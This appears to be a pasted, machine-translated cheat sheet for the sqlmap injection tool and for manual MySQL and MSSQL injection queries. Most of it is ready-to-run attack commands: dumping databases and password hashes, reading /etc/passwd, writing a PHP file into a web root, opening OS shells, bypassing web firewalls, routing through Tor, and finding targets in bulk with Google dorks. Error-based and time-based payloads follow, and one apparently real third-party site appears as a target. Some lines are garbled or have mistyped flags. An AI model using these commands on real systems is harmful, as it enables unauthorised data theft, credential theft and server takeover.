· 6 years ago · Dec 14, 2019, 11:02 PM
1# Basic usage
2
3./sqlmap.py -u "inject address" --dbs // enumerate database
4./sqlmap.py -u "inject address" --current-db // current database
5./sqlmap.py -u "inject address" --users // column database user
6./sqlmap.py -u "inject address" --current-user // current user
7./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table name of the database
8./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column name of the table
9./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" // get the data in the table, including the column, is the pants
10
11# bypass WAF :
12--tamper= apostrophemask,apostrophenullencode,chardoubleencode,escapequotes,overlongutf8,space2plus,symboliclogical,base64encode,unionalltounion,xforwardedfor,multiplespaces,nonrecursivereplacement
13
14
15# Cookie injection:
16sqlmap.py -u URL --cookie "parameter" --tables --level 2
17
18# POST login box injection:
19sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
20
21Bypass WAF :
22
23sqlmap.py -u "inject address" -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
24Sqlmap.py -u URL -v 3 -dbms "MySQL" --tamper "space2morehash.py" --referer "http://www.google.com" - -user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
25
26sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
27
28
29
30
31# Submit using the POST method
32sqlmap -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1"
33sqlmap -u "https://xxxxx//search.aspx" --forms --batch --crawl=10 --dbms=MSSQL --dbs --current-db --technique=BEUST --risk=3 --level=3
34
35# Read the database version, current user, current database
36Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1
37
38# Determine the current database user permissions
39Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --privileges -U username-v 1
40Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --is-dba -U username-v 1
41
42# Read the passwords of all database users or specified database users
43Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2
44Sqlmap.py-u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2
45
46# Get all the databases
47Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2
48
49# Get all the tables in the specified database
50Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2
51
52# Get the field of the specified table in the specified database name
53Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2
54
55# Get the data of the specified field in the specified table in the specified database name
56Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2
57
58# file-read read web file
59
60Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
61
62# file-write writes files to the web
63Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
64
65#union Query table record
66
67Sqlmap.py -u "http://url/news?id=1" --union-cols
68
69# injection
70
71# Get the current user name
72Sqlmap.py -u "http://url/news?id=1" --current-user
73# Get the current database name
74Sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db
75# listname
76Sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
77#column field
78Sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0
79#Get the field contents
80Sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
81# smart smart level Execution test level
82Sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users
83# dbms Specify database type
84Sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users
85#column database user
86Sqlmap.py -u "http://url/news?id=1" --users
87
88
89# Instructions for use:
90Injection point: www.xxx.com/user.jsp?id=1
91
921. Determine if the injection exists
93sqlmap.py -u "www.xxx.com/user.jsp?id=1"
94
952. Get the database (Access database does not need to be obtained)
96sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs
97
983. View the database used by the current application (Access database does not need to be obtained)
99sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db
100
1014. List all the tables of the specified database
102sqlmap.py -u "www.xxx.com/user.jsp?id=1" --table -D database
103
1045. Read the field name in the specified table
105Sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "datasheet" -D "database"
106
1076. Read the contents of the specified field
108Sqlmap.py -u "www.xxx.com/user.jspid=1" --dump -C" field" -T "datasheet" -D "database"
109After reading the data, Sqlmap will dump the read data to the Sqlmap/output/ directory, and the file will be saved as "Table.cvs".
110
1111. Test injection point permissions
112Sqlmap.py -u "URL" --privileges //Test permissions for all users
113Sqlmap.py -u "URL" --privileges -U sa //Test sa user rights
114
1152. Execute the Shell command
116Sqlmap.py -u "URL" --os-cmd="net user" //Execute the net user command
117Sqlmap.py -u "URL" --os-shell //System interaction shell
118
1193. Get the current database name
120sqlmap.py -u "URL" --current-db
121
1224. Execute the SQL command
123Sqlmap.py -u "URL" --sql-shell //Returns the SQL interaction shell and can execute SQL statements
124Sqlmap.py -u "URL" --sql-query="sql"
125
1265.POST submission method
127Sqlmap.py -u "URL" --data "POST parameter"
128
1296. Display detailed levels
130sqlmap.py -u "URL" --dbs -v 1
131
132The -v parameter contains the following seven levels.
1330: only show Python backtracking, errors and key messages;
1341: Display information and warning information;
1352: Display debugging information;
1363: payload injection;
1374: Display HTTP request;
1385: Display HTTP response headers;
1396: Display the contents of the HTTP response page.
140
1417. Inject HTTP request
142Sqlmap.py -r head.txt --dbs //head.txt content is an HTTP request
143
144Head.txt can capture the contents of the burstsuit
145
1468. Connect directly to the database
147sqlmap.py -d"mysql://admin:admin@192.168.1.1:3306/testdb" --dbs
148
1499. Injection level
150sqlmap.py -u "URL" --level 3
151
15210. Insert the injection statement into the specified location (usually used for pseudo-static injection)
153sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs
154
15511. Use the Sqlmap plugin
156sqlmap.py -u "URL" --tamper "space2morehash.py"
157
158Sqlmap Tamper
159
160Script name: apostrophemask.py
161Role: use utf8 instead of quotes
162example:
163("1 AND '1'='1")
164'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
165Claim:
166All
167
168
169Script name: equaltolike.py
170Role: like instead of the equal sign
171example:
172SELECT · FROM users WHERE id=1
173SELECT · FROM users WHERE id LIKE 1
174Claim:
175·Microsoft SQL Server 2005
176· MySQL 4, 5.0 and 5.5
177
178
179## Sqlmap common parameters and instructions
180
181-b get banner
182-p specifies test parameters
183-g Get the URL from Google, -g "inurl:aspx?id="
184--gpage=GOOGLEPAGE Specify Google Page Numbers
185--union-check Whether to support union injection
186--union-cols union query table record
187--union-test union statement test
188--union-use uses union injection
189--proxy proxy injection
190--threads using multithreading
191--user-agent custom user-agent
192--referer=REFERER HTTP referer header
193--proxy=PROXY Use proxy
194--string specifies keywords
195--tor creates an anonymous network of tor
196--predict-output common query output prediction
197--keep-alive uses a persistent HTTP(S) connection
198--eval=EVALCODE Pollution with HTTP parameters
199-a,-all query all
200--hostname hostname
201--is-dba is admin rights
202--users enumerates all users
203--password enumerates all user passwords
204--roles enumerates all user roles
205--schema enumeration DBMS mode
206--count retrieves the total number of entries
207--dump to dump the DBMS database table project, you need to develop the field name (column name)
208--dump-all dumps all table items in the DBMS database
209--search searches for a column, table, or database name
210--exclude-sysdbs Excludes the system database when enumerating tables
211--sql-query=query Execute SQL statement
212--file-read=RFILE read operation
213--file--write=WFILE write operation
214--file--dest=DFILE absolute path write
215--reg-read reads a Windows registry key value
216--reg-add adds a Windows registry key value data
217--reg-del deletes a Windows registry key value data
218--reg-key=REGKEY Windows registry key
219--reg-value=REGVAL Windows registry key
220--reg-data=REGDATA Key-value item data for the Windows registry
221--reg-type=REGTYPE Value type of the Windows registry key
222--dump-format=DUMP dump data format (CSV (default), HTML or SQLITE)
223--hex Use hexadecimal data retrieval
224--output-dir=ODIR directory path for custom output
225--update update Sqlmap
226--purge-output safely deletes the output directory of all content
227--check-waf heuristic check WAF/IPS/IDS protection
228--os-pwn bounce shell
229--cookie=COOKIE specifies HTTP cookie, pre-login
230--random-agent Use randomly selected User-Agent
231--tamper=TAMPER using the Sqlmap plugin
232--level test level (1-5), default is 1
233--auth-type Digest --auth-cred "testuser:testpass"
234--auth-type Basic --auth-cred "testuser:testpass"
235--dbms "PostgreSQL"
236* MySQL
237* Oracle
238* PostgreSQL
239* Microsoft SQL Server
240--os "Windows"
241* Linux
242* Windows
243
244# Access to information
245
246Sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms Specify database type
247Sqlmap -u "http://url/news?id=1" --users #column database user
248Sqlmap -u "http://url/news?id=1" --dbs #column database
249Sqlmap -u "http://url/news?id=1" --passwords #database user password
250Sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 #list the password of the specified user database
251Sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #list designation Field, list 20
252Sqlmap -u "http://url/news?id=1" --dump-all -v 0 #List all tables in all databases
253Sqlmap -u "http://url/news?id=1" --privileges #View Permissions
254Sqlmap -u "http://url/news?id=1" --privileges -U root #View specified user permissions
255Sqlmap -u "http://url/news?id=1" --is-dba -v 1 #is it a database administrator?
256Sqlmap -u "http://url/news?id=1" --roles #enumrate database user roles
257Sqlmap -u "http://url/news?id=1" --udf-inject #Import user-defined functions (get system privileges!)
258Sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #list out all tables in the current library
259Sqlmap -u "http://url/news?id=1" --union-cols #union Query table record
260Sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie injection
261Sqlmap -u "http://url/news?id=1" -b #Get banner information
262Sqlmap -u "http://url/news?id=1" --data "id=3" #postinjection
263Sqlmap -u "http://url/news?id=1" -v 1 -f #fingerprint database type
264Sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # Agent injection
265Sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" #Specify keywords
266Sqlmap -u "http://url/news?id=1" --sql-shell #Execute the specified sql command
267Sqlmap -u "http://url/news?id=1" --file /etc/passwd
268Sqlmap -u "http://url/news?id=1" --os-cmd=whoami #Execute system commands
269Sqlmap -u "http://url/news?id=1" --os-shell #system interactive shell
270Sqlmap -u "http://url/news?id=1" --os-pwn #bounce shell
271Sqlmap -u "http://url/news?id=1" --reg-read # read win system registry
272Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" # Save the progress
273Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # Restore saved progress
274
275
276
277
278# Fingerprinting the remote system and its database
279sqlmap.py -u "http://localhost/weak.php?id=10" -b
280
281Output :
282[11:19:51] [INFO] the back-end DBMS is MySQL
283[11:19:51] [INFO] fetching banner
284[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
285[11:19:51] [INFO] retrieved: 5.1.61
286web server operating system: Linux Red Hat Enterprise 6 (Santiago)
287web application technology: PHP 5.3.3, Apache 2.2.15
288back-end DBMS: MySQL 5.0.11
289banner: '5.1.61'
290
291# fetch the list of users and roles
292sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
293database management system users [5]:
294[*] ''@'localhost'
295[*] ''@'localhost.localdomain'
296[*] 'root'@'127.0.0.1'
297[*] 'root'@'localhost'
298[*] 'root'@'localhost.localdomain'
299database management system users password hashes:
300[*] [1]:
301 password hash: NULL
302[*] root [2]:
303 password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
304 password hash: NULL
305
306# Reading a system file
307sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
308
309# Run arbitrary sql command
310sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
311
312output :
313[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
314select now();: '2013-04-15 11:51:10'
315
316# Interactive shell
317sqlmap.py -u "http://www.xxx.com" --os-cmd "ipconfig"
318sqlmap.py -u "http://www.xxx.com" --os-shell
319sqlmap.py -u "http://www.xxx.com" --os-pwn
320sqlmap.py -u "http://www.xxx.com" --sql-shell
321
322# Form sql :
323/sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass
324
325
326# WAF bypass
327/sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass --tamper="space2hash.py" -v 3 --dbs
328
329
330# Tor with sqlmap :
331apt-get install -y tor
332Start the Tor service
333sudo service tor start
334
335sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15
336
337
338-v parameter, level of detail, observe how sqlmap is trying to judge a point and read data.
339
340## There are seven levels, the default is 1:
341
3420, only show python errors and serious information.
343
3441. Display basic information and warning information at the same time. (default)
345
3462. Display debug information at the same time.
347
3483. Display the injected payload at the same time.
349
3504. Display HTTP requests at the same time.
351
3525. Display the HTTP response header at the same time.
353
3546. Display the HTTP response page at the same time.
355
356
357# Use sqlmap to remove pants
358The –dump parameter is used to remove the pants. Add the whole -all(–dump-all) if you drag the whole
359
360Specify the field specified in the specified table:
361
362sqlmap -u "http://xxx/index.php?id=1" --dump -D DBName -T TableName -C "id,username,password"
363
364Take off the entire pants:
365
366sqlmap -u "http://xxx/index.php?id=1" -D DBName --dump-all
367
368
369# Advanced usage
370
371-p name Multiple parameters such as index.php?n_id=1&name=2&data=2020 We want to specify the name parameter to inject
372
373Sqlmap -g "google syntax" --dump-all --batch #google search injection point automatically runs out all fields, you need to ensure that google.com can access normally
374
375--technique test specifies the type of injection\technology used
376
377Test all injection techniques by default without parameters
378• B: Boolean based SQL blind
379• E: based on error sql injection
380• U: based on UNION injection
381• S: stacked sql injection
382• T: Time-based blind
383
384--tamper bypasses the WEB firewall (WAF) Sqlmap by encoding by default with char()
385
386--tamper plugin directory \sqlmap-dev\tamper
387
388Sqlmap -u "http:// www.2cto.com /news?id=1" --smart --level 3 --users #smart Intelligent level execution test level
389
390Attack example:
391Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="xxx" --string="Surname" --dbms=mysql --user --password
392
393# Request
394These options can be used to specify how to connect to the target URL :
395
396--data=DATA Data string sent via POST
397--cookie=COOKIE HTTP Cookie header
398--cookie-urlencode URL encoding generated by cookie injection
399--drop-set-cookie Ignore the Set-Cookie header of the response
400--user-agent=AGENT Specifies the HTTP User --Agent header
401--random-agent uses a randomly selected HTTP User --Agent header
402--referer=REFERER Specifies the HTTP Referer header
403--headers=HEADERS Wrap separate, add other HTTP headers
404--auth-type=ATYPE HTTP authentication type (basic, digest or NTLM) (Basic, Digest or NTLM)
405--auth-cred=ACRED HTTP authentication credentials (username: password)
406--auth-cert=ACERT HTTP certificate (key_file, cert_file)
407--proxy=PROXY Connect to the target URL using an HTTP proxy
408--proxy-cred=PCRED HTTP Proxy Authentication Credentials (Username: Password)
409--ignore-proxy ignores the system default HTTP proxy
410--delay=DELAY The delay between each HTTP request in seconds
411--timeout=TIMEOUT Time to wait for the connection to time out (default is 30 seconds)
412--retries=RETRIES Time to reconnect after connection timeout (default 3)
413--scope=SCOPE Regular expression for the filter target from the provided proxy log
414--safe-url=SAFURL The url address that is frequently accessed during the test.
415--safe-freq=SAFREQ Test request between visits, giving a secure URL
416
417# Enumeration
418
419These options can be used to enumerate information about the back-end database management system, the structure and data in the tables. In addition, you can also run your own SQL statements.
420
421-b, --banner Retrieve the identity of the database management system
422--current-user retrieves the current user of the database management system
423--current-db retrieves the current database of the database management system
424--is-dba Detects whether the DBMS current user is DBA
425--users enumerates database management system users
426--passwords enumerates database management system user password hashes
427--privileges enumerates permissions for database management system users
428--roles enumerates the roles of database management system users
429--dbs enumerates the database management system database
430--tables enumerates tables in the DBMS database
431--columns enumerates DBMS database table columns
432--dump dumps the entries in the database of the database management system
433--dump-all dumps entries in all DBMS database tables
434--search search column(s), table(s) and/or database name(s)
435-D DB The name of the database to be enumerated
436-T TBL Database table to be enumerated
437-C COL Database column to be enumerated
438-U USER database user used for enumeration
439--exclude-sysdbs Exclude system database when enumerating tables
440--start=LIMITSTART The first query output goes into the search
441--stop=LIMITSTOP The output of the last query goes into the search
442--first=FIRSTCHAR Character search for the first query output word
443--last=LASTCHAR Output word character retrieval for the last query
444--sql-query=QUERY SQL statement to execute
445--sql-shell prompts interactive SQL shell
446
447# Optimization
448
449These options can be used to optimize the performance of SqlMap.
450
451-o turn on all optimization switches
452--predict-output predicts common query output
453--keep-alive uses a persistent HTTP(S) connection
454--null-connection retrieves page length from no actual HTTP response body
455--threads=THREADS Maximum HTTP(S) request concurrency (default is 1)
456-p TESTPARAMETER testable parameters (S)
457--dbms=DBMS forces the backend DBMS to this value
458--os=OS forces the backend DBMS operating system to this value
459--prefix=PREFIX injection payload string prefix
460--suffix=SUFFIX injection payload string suffix
461--tamper=TAMPER Tampering with injected data using the given script(s)
462
463# Detection
464
465These options can be used to specify how to parse and compare the contents of an HTTP response page when the SQL blinds.
466
467--level=LEVEL The level at which the test is performed (1-5, default is 1)
468--risk=RISK Risk of performing tests (0-3, default is 1)
469--string=STRING Matches the string when the query is valid
470--regexp=REGEXP Query regular expression on page when valid
471--text-only based only on text content comparison pages
472
473# Techniques
474
475These options can be used to tune specific SQL injection tests.
476
477--technique=TECH SQL injection technology test (default BEUST)
478--time-sec=TIMESEC DBMS response delay time (default is 5 seconds)
479--union-cols=UCOLS Queued range for testing UNION query injection
480--union-char=UCHAR Character used to violently guess the number of columns
481
482# Fingerprint (fingerprint)
483
484-f, –fingerprint Execute checks for extensive DBMS version fingerprints
485
486
487# Brute force
488
489These options can be used to run brute force checks.
490
491--common-tables check for the existence of a common table
492--common-columns check for common columns
493
494
495# User-defined function injection
496
497These options can be used to create user-defined functions.
498
499--udf-inject injection user-defined function
500--shared-lib=SHLIB local path to the shared library
501
502# File system access
503These options can be used to access the underlying file system of the backend database management system.
504
505--file-read=RFILE Reads files from the backend database management system file system
506--file-write=WFILE Edit the local file on the backend database management system file system
507--file-dest=DFILE The absolute path of the file management system write file to the backend
508
509# Operating system access
510
511These options can be used to access the underlying operating system of the back-end database management system.
512
513--os-shell interactive operating system shell
514--os-pwn Get an OOB shell, meterpreter or VNC
515--os-smbrelay Get an OOB shell, meterpreter or VNC with one click
516--os-bof stored procedure buffer overflow exploit
517--priv-esc database process user privilege
518--msf-path=MSFPATH Metasploit Framework local installation path
519--tmp-path=TMPPATH Absolute path to the remote temporary file directory
520
521
522# Windows registry access
523
524These options can be used to access the backend database management system Windows registry.
525
526--reg-read read a Windows registry key value
527--reg-add writes a Windows registry key value data
528--reg-del removes the Windows registry key
529--reg-key=REGKEY Windows registry key
530--reg-value=REGVAL Windows registry key value
531--reg-data=REGDATA Windows registry key value data
532--reg-type=REGTYPE Windows registry key value type
533
534# General
535These options can be used to set some general working parameters.
536
537-t TRAFFICFILE logs all HTTP traffic to a text file
538-s SESSIONFILE Saves and restores all data retrieved from the session file
539--flush-session refresh the current target session file
540--fresh-queries ignores query results stored in session files
541--eta shows the estimated arrival time of each output
542--update Update SqlMap
543--save file Save options to the INI configuration file
544--batch never asks for user input, using all default configurations.
545
546# Miscellaneous (miscellaneous)
547
548--beep find reminders when SQL injection
549--check-payload IDS detection test for injected payloads
550--cleanup SqlMap concrete UDF and table cleanup DBMS
551--forms parsing and testing form of target URL
552--gpage=GOOGLEPAGE Use Google Dork results from the specified page number
553--page-rank Google dork results show page rank (PR)
554--parse-errors parse database management system error messages from the response page
555--replicate copy dumped data to a sqlite3 database
556--tor uses the default Tor (Vidalia / Privoxy / Polipo) proxy address
557--wizard Simple wizard interface for beginners
558
559
560
561
562
563# Partial usage of SQLMAP
564
5651) to determine whether the current user is dba
566python sqlmap.py -u "url" --is-dba -v 1
567
5682)--users: list database management system user
569python sqlmap.py -u "url" --users -v 0
570
5713)--passwords: database user password (hash)
572python sqlmap.py -u "url" --passwords -v 0
573python sqlmap.py -u "url" --passwords -U Sa -v 0
574
5754) View user permissions
576python sqlmap.py -u "url" --privileges -v 0
577python sqlmap.py -u "url" --privileges -U postgres -v 0
578
5795)--dbs can be utilized Database
580python sqlmap.py -u "url" --dbs -v 0
581
5826)--tables column database table
583python sqlmap.py -u "url" --tables -D "information_scheam"
584-D: specify the data name
585
5867)- -columns lists the column names in the table
587python sqlmap.py -u "url"--columns -T "user" -D "mysql" -v 1
588-T: specify the name of the table, -D: specify the name of the library
589
5908) --- The contents of the specified column in the list of
591db python sqlmap.py -u "url" --dump -T "users" -D "testdb"
592-C: can specify the
593specified column range of 2 to 4
594python sqlmap. Py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
595
5969)--dumap-all lists all databases, all table contents
597python sqlmap.py - u "url" --dump-all -v 0
598only lists the contents of the user's own new database and table
599python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
600
60110)-- File read file contents [load_file() function]
602python sqlmap.py -u "url" --file /etc/password
603
60411) Execute SQL
605python sqlmap.py -u "url" --sql-shell
606
60712)-p Specify Parameters
608python sqlmap.py -u "url" -v 1 -p "id"
609-p can specify multiple parameters -p "cat,id"
610
61113) POST submit
612python sqlmap.py -u "url" --method POST --data "id=1"
613
61414)COOKIE submission
615Python sqlmap.py -u "url" --cookie "id=1" -v 1
616cookie value can be fetched by TamperData
617
61815)refer trick
619python sqlmap.py -u "url" --refer "url" -v 3
620
62116 ) Use custom user-agent or user-agents.txt
622python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
623python sqlmap.py - u "url" -v 1 -a "./txt/user-agents.txt"
624
62517) Use multithreading to guess
626python sqlmap.py -u "url" -v 1 --current-user --threads 3
627
62818) Specify the database, bypass the automatic detection of
629SQLMAP python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
630
63119) Specify the operating system to bypass SQLMAP to automatically detect
632python sqlmap.py -u "url" -v 2 - -os "Windows"
633
63420)--prefix and --postfix Custom payload
635python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
636
63721)Union injection test
638python sqlmap.py -u "url" --union-test -v -1
639
64022)With order by
641python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
642
64323)python sqlmap.py -u "url" -v 1 --union-use --banner
64424)python sqlmap.py -u "url" -v 5 --union-use --current-user
64525)python sqlmap.py -u "url" -v 1 --union-use --dbs
646
647//Execute SQL statement
648Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 –sql-shell
649
650//More detailed information
651Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5
652
653
654
655# Mysql commands :
656SELECT database()
657SELECT version()
658SELECT user()
659select datadir()
660SELECT @@datadir
661SELECT user FROM mysql.user
662SELECT schema_names FROM information_schema.schemata
663SELECT @@hostname
664UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) —
665select @@basedir
666Select system_user()
667select current_user()
668select user()
669select @@version_compile_os
670select now()
671Desc table name or show columns from table name
672select * from users union select 1,load_file('/etc/passwd'),3;
673select * from users union select 1,load_file(0x2F6574632F706173737764),3;
674select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';
675select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';
676# Get the version number
677SELECT @@version
678SELECT version()
679# host name, IP address
680SELECT @@hostname;
681# username and password
682SELECT host, user, password FROM mysql.user;
683# username
684SELECT user();
685SELECT system_user();
686SELECT user FROM mysql.user;
687SELECT current_user;
688SELECT distinct(db) FROM mysql.db
689SELECT schema_name FROM information_schema.schemata;
690SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema = ' customers_db'
691SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema!='mysql' AND table_schema!=' information_schema'
692SELECT table_schema, table_name column_name FROM information_schema.columns WHERE table_schema!='mysql' AND table_schema!=' information_schema'
693SELECT table_schema, table_name, column FROM Information_schema.columns WHERE table_schema != 'mysql' AND Table_schema != 'information_schema';
694SELECT table_schema, table_name column_name FROM information_schema.columns WHERE column_name LIKE 'password' OR column_name LIKE 'credit_card'
695SELECT grantee, privilege_type, is_grantable
696SELECT grantee, table_schema, privilege_type FROM Information_schema.schema_ privileges;
697
698SELECT load_file('databasename/tablename.MYD')
699tables_priv.MYD
700host.MYD
701help_keyword.MYD
702columns_priv.MYD
703db.MYD
704
705
706# User rights related
707# enumerate user permissions
708SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
709
710# enumerate user permissions
711SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user ;
712
713# enumerate database permissions
714SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
715
716# List columns_priv
717SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
718
719# List database
720# current library
721SELECT database();
722
723# All libraries (Mysql > 5.0)
724SELECT schema_name FROM information_schema.schemata;
725
726# List name
727# common
728SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
729
730# Find the name of the table based on the column name
731SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
732
733# List field names
734SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
735
736# Single data acquisition
737
738SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0;
739
740SELECT host,user FROM user ORDER BY host LIMIT 0,1;
741
742# Error injection
743
744And (select 1 from (select count(*), concat(SQL statement, floor(rand(0)*2))x from information_schema.tables group by x)a);
745And (select count(*) from (select 1 union select null union select !1)x group by concat(SQL statement, floor(rand(0)*2)));
746And extractvalue(1, concat(0x5c, (SQL statement)));
747And 1=(updatexml(1,concat(0x5e24,(SQL statement), 0x5e24),1));
748
749# Delay injection
750
751SELECT BENCHMARK(1000000,MD5('A'));
752SELECT SLEEP(5);
753
754# File reading and writing
755
756#Read file, need relevant permissions
757UNION SELECT LOAD_FILE('/etc/passwd')
758
759# Write file, need relevant permissions
760SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
761
762# Write file, need relevant permissions
763SELECT * FROM mytable INTO outfile '/tmp/somefile'
764
765# Judgment and string correlation
766# if judging
767SELECT if(1=1,'foo','bar'); #回 foo
768
769# CASE WHEN Judgment
770SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # Back A
771
772# char function, convert numbers to characters
773SELECT char(65);
774
775# ascii function, convert characters to numbers
776SELECT ascii('A');
777
778# CONCAT function to connect characters together
779SELECT CONCAT('A','B');
780
781# string hexadecimal notation
782SELECT 0×414243;
783
784# substring/substr function
785SELECT substr('abcd', 3, 1);
786
787# length function
788SELECT length('abcd');
789
790# MSSQL
791
792# Database version
793SELECT @@version
794
795# host name, IP address
796SELECT HOST_NAME()
797
798# Current user
799SELECT user_name();
800SELECT system_user;
801SELECT user;
802SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
803
804# List all users
805SELECT name FROM master..syslogins
806#Column password MS MSSQL 2005
807SELECT name, password_hash FROM master.sys.sql_logins --*
808SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*
809
810
811# List database
812SELECT DB_NAME()
813
814# enumeration library
815SELECT name FROM master..sysdatabases;
816SELECT DB_NAME(N); — where N = 0, 1, 2,
817
818# Permission related
819
820# Judging current user rights
821SELECT is_srvrolemember('sysadmin');
822SELECT is_srvrolemember('dbcreator');
823SELECT is_srvrolemember('bulkadmin');
824SELECT is_srvrolemember('diskadmin');
825SELECT is_srvrolemember('processadmin');
826SELECT is_srvrolemember('serveradmin');
827SELECT is_srvrolemember('setupadmin');
828SELECT is_srvrolemember('securityadmin');
829
830# Determine the permissions of a specified user
831SELECT is_srvrolemember('sysadmin', 'sa');
832
833# Determine if it is a library permission
834And 1=(Select IS_MEMBER('db_owner'))
835
836# Determine if there is library read permission
837And 1= (Select HAS_DBACCESS('master'))
838
839# Get the username with a certain permission
840SELECT name FROM master..syslogins WHERE denylogin = 0;
841SELECT name FROM master..syslogins WHERE hasaccess = 1;
842SELECT name FROM master..syslogins WHERE isntname = 0;
843SELECT name FROM master..syslogins WHERE isntgroup = 0;
844SELECT name FROM master..syslogins WHERE sysadmin = 1;
845SELECT name FROM master..syslogins WHERE securityadmin = 1;
846SELECT name FROM master..syslogins WHERE serveradmin = 1;
847SELECT name FROM master..syslogins WHERE setupadmin = 1;
848SELECT name FROM master..syslogins WHERE processadmin = 1;
849SELECT name FROM master..syslogins WHERE diskadmin = 1;
850SELECT name FROM master..syslogins WHERE dbcreator = 1;
851SELECT name FROM master..syslogins WHERE bulkadmin = 1;
852
853# Currently owned permissions
854SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); — current database
855SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); — current server
856SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); –permissions on a table
857SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
858
859# Error injection
860# Direct comparison with numbers
861Id=1 and @@version>0--
862Id=1 and user>0--
